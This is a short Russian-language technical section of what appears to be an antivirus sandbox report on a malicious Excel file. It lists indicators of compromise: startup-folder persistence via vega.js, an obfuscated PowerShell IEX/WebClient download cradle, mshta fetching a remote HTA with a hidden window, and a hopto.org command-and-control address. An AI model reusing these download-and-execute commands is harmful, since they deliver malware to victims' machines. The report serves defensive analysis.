Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\vega.js
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''http://tr######e.sslblindado.com/verissimo'',$env:TEMP+''\\''+''vega.js'')'|D; sta...
- %TEMP%\vega.js
- '12##.hopto.org':7974
- http://tr######e.sslblindado.com/verissimo.html
- http://tr######e.sslblindado.com/verissimo
- DNS ASK tr######e.sslblindado.com
- DNS ASK 12##.hopto.org
- '<SYSTEM32>\wscript.exe' "%TEMP%\vega.js"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''http://tr######e.sslblindado.com/verissimo'',$env:TEMP+''\\''+''vega.js'')'|D; sta...' (со скрытым окном)
- '<SYSTEM32>\mshta.exe' http://tr######e.sslblindado.com/verissimo.html' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\mshta.exe' http://tr######e.sslblindado.com/verissimo.html